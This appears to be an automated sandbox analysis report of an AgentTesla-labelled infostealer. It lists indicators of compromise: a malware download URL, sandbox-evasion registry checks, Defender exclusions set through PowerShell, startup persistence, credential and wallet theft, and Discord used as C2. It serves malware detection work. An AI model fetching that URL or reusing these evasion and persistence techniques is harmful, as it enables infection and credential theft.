agenttesla | hxxps://megawrzuta[.]pl/download/a37d5e686e4f49742da6a1037228b741[.]html

Virtualization/Sandbox Evasion

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Oracle\VirtualBox Guest Additions	spoofer.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 8 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
1604	powershell.exe
4720	powershell.exe
1480	powershell.exe
3536	powershell.exe
5944	powershell.exe
1424	powershell.exe
1096	powershell.exe
1660	powershell.exe

Downloads MZ/PE file

Looks for VMWare Tools registry key 2 TTPs 1 IoCs

evasion

Query Registry

Virtualization/Sandbox Evasion

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\VMware, Inc.\VMware Tools	spoofer.exe

Checks BIOS information in registry 2 TTPs 2 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	spoofer.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	spoofer.exe

Drops startup file 6 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\tak.exe	tak.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\tak.exe	tak.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Kacper.lnk	Ethone.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Kacper.lnk	Ethone.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\External_V3.lnk	Update.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\External_V3.lnk	Update.exe

Event Triggered Execution: Component Object Model Hijacking 1 TTPs
Adversaries may establish persistence by executing malicious content triggered by hijacked references to Component Object Model (COM) objects.
persistence privilege_escalation

Component Object Model Hijacking
T1546.015

Executes dropped EXE 31 IoCs

pid	Process
5712	7z2407-x64.exe
2660	7zG.exe
4756	spoofer.exe
2692	Update.exe
3336	Ethone.exe
676	1.exe
5528	OperaGx.exe
3260	Kacper
5416	External_V3
2392	tak.exe
5712	tak.exe
5644	1.exe
4876	1.exe
5992	1.exe
2156	1.exe
5352	tak.exe
6092	tak.exe
2904	Kacper
3764	External_V3
1384	Kacper
3216	External_V3
4916	Kacper
5940	External_V3
1272	Kacper
1576	External_V3
5160	Kacper
3260	External_V3
3300	Kacper
3056	External_V3
3304	Kacper
5664	External_V3

Loads dropped DLL 64 IoCs

pid	Process
3308	Process not Found
2660	7zG.exe
4756	spoofer.exe
4756	spoofer.exe
5712	tak.exe
5712	tak.exe
5712	tak.exe
5712	tak.exe
5712	tak.exe
5712	tak.exe
5712	tak.exe
5712	tak.exe
5712	tak.exe
5712	tak.exe
5712	tak.exe
5712	tak.exe
5712	tak.exe
5712	tak.exe
5712	tak.exe
5712	tak.exe
5712	tak.exe
5712	tak.exe
5712	tak.exe
5712	tak.exe
5712	tak.exe
5712	tak.exe
5712	tak.exe
5712	tak.exe
5712	tak.exe
5712	tak.exe
5712	tak.exe
5712	tak.exe
5712	tak.exe
5712	tak.exe
5712	tak.exe
5712	tak.exe
5712	tak.exe
5712	tak.exe
5712	tak.exe
5712	tak.exe
5712	tak.exe
5712	tak.exe
5712	tak.exe
5712	tak.exe
5712	tak.exe
5712	tak.exe
5712	tak.exe
6092	tak.exe
6092	tak.exe
6092	tak.exe
6092	tak.exe
6092	tak.exe
6092	tak.exe
6092	tak.exe
6092	tak.exe
6092	tak.exe
6092	tak.exe
6092	tak.exe
6092	tak.exe
6092	tak.exe
6092	tak.exe
6092	tak.exe
6092	tak.exe
6092	tak.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3866437728-1832012455-4133739663-1000\Software\Microsoft\Windows\CurrentVersion\Run\Kacper = "C:\\Users\\Admin\\AppData\\Roaming\\Kacper"	Ethone.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3866437728-1832012455-4133739663-1000\Software\Microsoft\Windows\CurrentVersion\Run\External_V3 = "C:\\Users\\Admin\\AppData\\Roaming\\External_V3"	Update.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Legitimate hosting services abused for malware hosting/C2 1 TTPs 7 IoCs

Web Service

T1102

flow	ioc
128	discord.com
132	discord.com
145	discord.com
150	discord.com
153	discord.com
49	discord.com
121	discord.com

Looks up external IP address via web service 4 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
29	ip-api.com
47	api.ipify.org
111	api.ipify.org
138	api.ipify.org

Maps connected drives based on registry 3 TTPs 2 IoCs

Disk information is often read in order to detect sandboxing environments.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum	spoofer.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0	spoofer.exe

Drops file in Program Files directory 64 IoCs

description	ioc	Process
File opened for modification	C:\Program Files\7-Zip\Lang\sv.txt	7z2407-x64.exe
File opened for modification	C:\Program Files\7-Zip\7-zip.dll	7z2407-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\da.txt	7z2407-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\et.txt	7z2407-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\tk.txt	7z2407-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\lij.txt	7z2407-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\sq.txt	7z2407-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\hi.txt	7z2407-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\nb.txt	7z2407-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\ta.txt	7z2407-x64.exe
File opened for modification	C:\Program Files\7-Zip\7zCon.sfx	7z2407-x64.exe
File opened for modification	C:\Program Files\7-Zip\descript.ion	7z2407-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\he.txt	7z2407-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\fi.txt	7z2407-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\sa.txt	7z2407-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\fr.txt	7z2407-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\ku.txt	7z2407-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\mr.txt	7z2407-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\br.txt	7z2407-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\en.ttt	7z2407-x64.exe
File opened for modification	C:\Program Files\7-Zip\Uninstall.exe	7z2407-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\mng2.txt	7z2407-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\nn.txt	7z2407-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\ko.txt	7z2407-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\va.txt	7z2407-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\ca.txt	7z2407-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\ro.txt	7z2407-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\kk.txt	7z2407-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\lv.txt	7z2407-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\it.txt	7z2407-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\hu.txt	7z2407-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\sk.txt	7z2407-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\ast.txt	7z2407-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\bg.txt	7z2407-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\is.txt	7z2407-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\ky.txt	7z2407-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\ps.txt	7z2407-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\tg.txt	7z2407-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\az.txt	7z2407-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\hy.txt	7z2407-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\sw.txt	7z2407-x64.exe
File opened for modification	C:\Program Files\7-Zip\readme.txt	7z2407-x64.exe
File opened for modification	C:\Program Files\7-Zip\7z.sfx	7z2407-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\ar.txt	7z2407-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\kab.txt	7z2407-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\sr-spl.txt	7z2407-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\io.txt	7z2407-x64.exe
File opened for modification	C:\Program Files\7-Zip\History.txt	7z2407-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\af.txt	7z2407-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\ru.txt	7z2407-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\ext.txt	7z2407-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\ga.txt	7z2407-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\gu.txt	7z2407-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\mn.txt	7z2407-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\el.txt	7z2407-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\fy.txt	7z2407-x64.exe
File opened for modification	C:\Program Files\7-Zip\7z.exe	7z2407-x64.exe
File opened for modification	C:\Program Files\7-Zip\7zG.exe	7z2407-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\be.txt	7z2407-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\cs.txt	7z2407-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\nl.txt	7z2407-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\pt-br.txt	7z2407-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\zh-cn.txt	7z2407-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\eo.txt	7z2407-x64.exe

Drops file in Windows directory 6 IoCs

description	ioc	Process
File created	C:\Windows\Fonts\Update.exe	spoofer.exe
File created	C:\Windows\Fonts\Ethone.exe	spoofer.exe
File created	C:\Windows\Fonts\1.exe	spoofer.exe
File created	C:\Windows\Fonts\tak.exe	spoofer.exe
File opened for modification	C:\Windows\Fonts\1.exe	spoofer.exe
File opened for modification	C:\Windows\Fonts\tak.exe	spoofer.exe

Detects Pyinstaller 1 IoCs

pyinstaller

resource	yara_rule
behavioral1/files/0x000300000002aa30-870.dat	pyinstaller

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Delays execution with timeout.exe 1 IoCs

evasion

pid	Process
5368	timeout.exe

Enumerates system info in registry 2 TTPs 6 IoCs

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	spoofer.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	spoofer.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemVersion	spoofer.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe

Modifies registry class 21 IoCs

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Folder\shellex\ContextMenuHandlers\7-Zip	7z2407-x64.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\DragDropHandlers\7-Zip	7z2407-x64.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Drive\shellex\DragDropHandlers\7-Zip\ = "{23170F69-40C1-278A-1000-000100020000}"	7z2407-x64.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{23170F69-40C1-278A-1000-000100020000}\InprocServer32\ = "C:\\Program Files\\7-Zip\\7-zip32.dll"	7z2407-x64.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{23170F69-40C1-278A-1000-000100020000}\ = "7-Zip Shell Extension"	7z2407-x64.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{23170F69-40C1-278A-1000-000100020000}\InprocServer32	7z2407-x64.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{23170F69-40C1-278A-1000-000100020000}\InprocServer32\ThreadingModel = "Apartment"	7z2407-x64.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\ContextMenuHandlers\7-Zip\ = "{23170F69-40C1-278A-1000-000100020000}"	7z2407-x64.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\DragDropHandlers\7-Zip\ = "{23170F69-40C1-278A-1000-000100020000}"	7z2407-x64.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Drive\shellex\DragDropHandlers\7-Zip	7z2407-x64.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{23170F69-40C1-278A-1000-000100020000}	7z2407-x64.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{23170F69-40C1-278A-1000-000100020000}\InprocServer32\ThreadingModel = "Apartment"	7z2407-x64.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{23170F69-40C1-278A-1000-000100020000}	7z2407-x64.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{23170F69-40C1-278A-1000-000100020000}\InprocServer32\ = "C:\\Program Files\\7-Zip\\7-zip.dll"	7z2407-x64.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\7-Zip\ = "{23170F69-40C1-278A-1000-000100020000}"	7z2407-x64.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Folder\ShellEx\ContextMenuHandlers\7-Zip\ = "{23170F69-40C1-278A-1000-000100020000}"	7z2407-x64.exe
Key created	\REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-3866437728-1832012455-4133739663-1000\{ADC236F9-35DF-4A57-9534-5A41B3AE81C8}	msedge.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{23170F69-40C1-278A-1000-000100020000}\ = "7-Zip Shell Extension"	7z2407-x64.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{23170F69-40C1-278A-1000-000100020000}\InprocServer32	7z2407-x64.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\7-Zip	7z2407-x64.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\ContextMenuHandlers\7-Zip	7z2407-x64.exe

NTFS ADS 3 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\Downloads\Debug.rar:Zone.Identifier	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 605578.crdownload:SmartScreen	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\7z2407-x64.exe:Zone.Identifier	msedge.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

pid	Process
5572	schtasks.exe
4796	schtasks.exe
1472	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
4532	msedge.exe
4532	msedge.exe
1836	msedge.exe
1836	msedge.exe
3152	identity_helper.exe
3152	identity_helper.exe
2064	msedge.exe
2064	msedge.exe
3752	msedge.exe
3752	msedge.exe
2892	msedge.exe
2892	msedge.exe
5484	msedge.exe
5484	msedge.exe
4756	spoofer.exe
4756	spoofer.exe
4756	spoofer.exe
4756	spoofer.exe
4756	spoofer.exe
4756	spoofer.exe
4756	spoofer.exe
4756	spoofer.exe
4756	spoofer.exe
4756	spoofer.exe
4756	spoofer.exe
4756	spoofer.exe
4756	spoofer.exe
4756	spoofer.exe
4756	spoofer.exe
4756	spoofer.exe
4756	spoofer.exe
676	1.exe
676	1.exe
676	1.exe
676	1.exe
676	1.exe
676	1.exe
676	1.exe
676	1.exe
676	1.exe
676	1.exe
676	1.exe
676	1.exe
676	1.exe
676	1.exe
676	1.exe
676	1.exe
676	1.exe
676	1.exe
676	1.exe
676	1.exe
676	1.exe
676	1.exe
676	1.exe
676	1.exe
676	1.exe
676	1.exe
1096	powershell.exe
1096	powershell.exe
1660	powershell.exe
1660	powershell.exe
1096	powershell.exe
1660	powershell.exe
4756	spoofer.exe

Suspicious behavior: GetForegroundWindowSpam 2 IoCs

pid	Process
3336	Ethone.exe
2692	Update.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 19 IoCs

pid	Process
1836	msedge.exe
1836	msedge.exe
1836	msedge.exe
1836	msedge.exe
1836	msedge.exe
1836	msedge.exe
1836	msedge.exe
1836	msedge.exe
1836	msedge.exe
1836	msedge.exe
1836	msedge.exe
1836	msedge.exe
1836	msedge.exe
1836	msedge.exe
1836	msedge.exe
1836	msedge.exe
1836	msedge.exe
1836	msedge.exe
1836	msedge.exe

Suspicious use of AdjustPrivilegeToken 43 IoCs

description	pid	Process
Token: SeRestorePrivilege	2660	7zG.exe
Token: 35	2660	7zG.exe
Token: SeSecurityPrivilege	2660	7zG.exe
Token: SeSecurityPrivilege	2660	7zG.exe
Token: SeDebugPrivilege	4756	spoofer.exe
Token: 33	5432	AUDIODG.EXE
Token: SeIncBasePriorityPrivilege	5432	AUDIODG.EXE
Token: SeDebugPrivilege	2692	Update.exe
Token: SeDebugPrivilege	3336	Ethone.exe
Token: SeDebugPrivilege	676	1.exe
Token: SeDebugPrivilege	676	1.exe
Token: SeDebugPrivilege	1096	powershell.exe
Token: SeDebugPrivilege	1660	powershell.exe
Token: SeDebugPrivilege	4720	powershell.exe
Token: SeDebugPrivilege	1604	powershell.exe
Token: SeDebugPrivilege	1480	powershell.exe
Token: SeDebugPrivilege	3536	powershell.exe
Token: SeDebugPrivilege	5944	powershell.exe
Token: SeDebugPrivilege	1424	powershell.exe
Token: SeDebugPrivilege	5528	OperaGx.exe
Token: SeDebugPrivilege	5528	OperaGx.exe
Token: SeDebugPrivilege	3336	Ethone.exe
Token: SeDebugPrivilege	2692	Update.exe
Token: SeDebugPrivilege	3260	Kacper
Token: SeDebugPrivilege	5416	External_V3
Token: SeDebugPrivilege	5644	1.exe
Token: SeDebugPrivilege	4876	1.exe
Token: SeDebugPrivilege	5992	1.exe
Token: SeDebugPrivilege	2156	1.exe
Token: SeDebugPrivilege	2904	Kacper
Token: SeDebugPrivilege	3764	External_V3
Token: SeDebugPrivilege	3216	External_V3
Token: SeDebugPrivilege	1384	Kacper
Token: SeDebugPrivilege	4916	Kacper
Token: SeDebugPrivilege	5940	External_V3
Token: SeDebugPrivilege	1272	Kacper
Token: SeDebugPrivilege	1576	External_V3
Token: SeDebugPrivilege	5160	Kacper
Token: SeDebugPrivilege	3260	External_V3
Token: SeDebugPrivilege	3300	Kacper
Token: SeDebugPrivilege	3056	External_V3
Token: SeDebugPrivilege	3304	Kacper
Token: SeDebugPrivilege	5664	External_V3

Suspicious use of FindShellTrayWindow 58 IoCs

pid	Process
1836	msedge.exe
1836	msedge.exe
1836	msedge.exe
1836	msedge.exe
1836	msedge.exe
1836	msedge.exe
1836	msedge.exe
1836	msedge.exe
1836	msedge.exe
1836	msedge.exe
1836	msedge.exe
1836	msedge.exe
1836	msedge.exe
1836	msedge.exe
1836	msedge.exe
1836	msedge.exe
1836	msedge.exe
1836	msedge.exe
1836	msedge.exe
1836	msedge.exe
1836	msedge.exe
1836	msedge.exe
1836	msedge.exe
1836	msedge.exe
1836	msedge.exe
1836	msedge.exe
1836	msedge.exe
1836	msedge.exe
1836	msedge.exe
1836	msedge.exe
1836	msedge.exe
1836	msedge.exe
1836	msedge.exe
1836	msedge.exe
1836	msedge.exe
1836	msedge.exe
1836	msedge.exe
1836	msedge.exe
1836	msedge.exe
1836	msedge.exe
1836	msedge.exe
1836	msedge.exe
1836	msedge.exe
1836	msedge.exe
1836	msedge.exe
1836	msedge.exe
1836	msedge.exe
1836	msedge.exe
1836	msedge.exe
1836	msedge.exe
1836	msedge.exe
1836	msedge.exe
1836	msedge.exe
1836	msedge.exe
1836	msedge.exe
1836	msedge.exe
2660	7zG.exe
1836	msedge.exe

Suspicious use of SendNotifyMessage 12 IoCs

pid	Process
1836	msedge.exe
1836	msedge.exe
1836	msedge.exe
1836	msedge.exe
1836	msedge.exe
1836	msedge.exe
1836	msedge.exe
1836	msedge.exe
1836	msedge.exe
1836	msedge.exe
1836	msedge.exe
1836	msedge.exe

Suspicious use of SetWindowsHookEx 3 IoCs

pid	Process
5712	7z2407-x64.exe
3336	Ethone.exe
2692	Update.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1836 wrote to memory of 4332	1836	msedge.exe	81
PID 1836 wrote to memory of 4332	1836	msedge.exe	81
PID 1836 wrote to memory of 2756	1836	msedge.exe	82
PID 1836 wrote to memory of 2756	1836	msedge.exe	82
PID 1836 wrote to memory of 2756	1836	msedge.exe	82
PID 1836 wrote to memory of 2756	1836	msedge.exe	82
PID 1836 wrote to memory of 2756	1836	msedge.exe	82
PID 1836 wrote to memory of 2756	1836	msedge.exe	82
PID 1836 wrote to memory of 2756	1836	msedge.exe	82
PID 1836 wrote to memory of 2756	1836	msedge.exe	82
PID 1836 wrote to memory of 2756	1836	msedge.exe	82
PID 1836 wrote to memory of 2756	1836	msedge.exe	82
PID 1836 wrote to memory of 2756	1836	msedge.exe	82
PID 1836 wrote to memory of 2756	1836	msedge.exe	82
PID 1836 wrote to memory of 2756	1836	msedge.exe	82
PID 1836 wrote to memory of 2756	1836	msedge.exe	82
PID 1836 wrote to memory of 2756	1836	msedge.exe	82
PID 1836 wrote to memory of 2756	1836	msedge.exe	82
PID 1836 wrote to memory of 2756	1836	msedge.exe	82
PID 1836 wrote to memory of 2756	1836	msedge.exe	82
PID 1836 wrote to memory of 2756	1836	msedge.exe	82
PID 1836 wrote to memory of 2756	1836	msedge.exe	82
PID 1836 wrote to memory of 2756	1836	msedge.exe	82
PID 1836 wrote to memory of 2756	1836	msedge.exe	82
PID 1836 wrote to memory of 2756	1836	msedge.exe	82
PID 1836 wrote to memory of 2756	1836	msedge.exe	82
PID 1836 wrote to memory of 2756	1836	msedge.exe	82
PID 1836 wrote to memory of 2756	1836	msedge.exe	82
PID 1836 wrote to memory of 2756	1836	msedge.exe	82
PID 1836 wrote to memory of 2756	1836	msedge.exe	82
PID 1836 wrote to memory of 2756	1836	msedge.exe	82
PID 1836 wrote to memory of 2756	1836	msedge.exe	82
PID 1836 wrote to memory of 2756	1836	msedge.exe	82
PID 1836 wrote to memory of 2756	1836	msedge.exe	82
PID 1836 wrote to memory of 2756	1836	msedge.exe	82
PID 1836 wrote to memory of 2756	1836	msedge.exe	82
PID 1836 wrote to memory of 2756	1836	msedge.exe	82
PID 1836 wrote to memory of 2756	1836	msedge.exe	82
PID 1836 wrote to memory of 2756	1836	msedge.exe	82
PID 1836 wrote to memory of 2756	1836	msedge.exe	82
PID 1836 wrote to memory of 2756	1836	msedge.exe	82
PID 1836 wrote to memory of 2756	1836	msedge.exe	82
PID 1836 wrote to memory of 4532	1836	msedge.exe	83
PID 1836 wrote to memory of 4532	1836	msedge.exe	83
PID 1836 wrote to memory of 828	1836	msedge.exe	84
PID 1836 wrote to memory of 828	1836	msedge.exe	84
PID 1836 wrote to memory of 828	1836	msedge.exe	84
PID 1836 wrote to memory of 828	1836	msedge.exe	84
PID 1836 wrote to memory of 828	1836	msedge.exe	84
PID 1836 wrote to memory of 828	1836	msedge.exe	84
PID 1836 wrote to memory of 828	1836	msedge.exe	84
PID 1836 wrote to memory of 828	1836	msedge.exe	84
PID 1836 wrote to memory of 828	1836	msedge.exe	84
PID 1836 wrote to memory of 828	1836	msedge.exe	84
PID 1836 wrote to memory of 828	1836	msedge.exe	84
PID 1836 wrote to memory of 828	1836	msedge.exe	84
PID 1836 wrote to memory of 828	1836	msedge.exe	84
PID 1836 wrote to memory of 828	1836	msedge.exe	84
PID 1836 wrote to memory of 828	1836	msedge.exe	84
PID 1836 wrote to memory of 828	1836	msedge.exe	84
PID 1836 wrote to memory of 828	1836	msedge.exe	84
PID 1836 wrote to memory of 828	1836	msedge.exe	84
PID 1836 wrote to memory of 828	1836	msedge.exe	84
PID 1836 wrote to memory of 828	1836	msedge.exe	84

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://megawrzuta.pl/download/a37d5e686e4f49742da6a1037228b741.html
1⤵
- Enumerates system info in registry
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:1836
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7fffac213cb8,0x7fffac213cc8,0x7fffac213cd8
  2⤵
  PID:4332
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1936,1844736293065725733,4618322994402400412,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1944 /prefetch:2
  2⤵
  PID:2756
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1936,1844736293065725733,4618322994402400412,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2380 /prefetch:3
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4532
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1936,1844736293065725733,4618322994402400412,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2620 /prefetch:8
  2⤵
  PID:828
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1936,1844736293065725733,4618322994402400412,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3276 /prefetch:1
  2⤵
  PID:1600
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
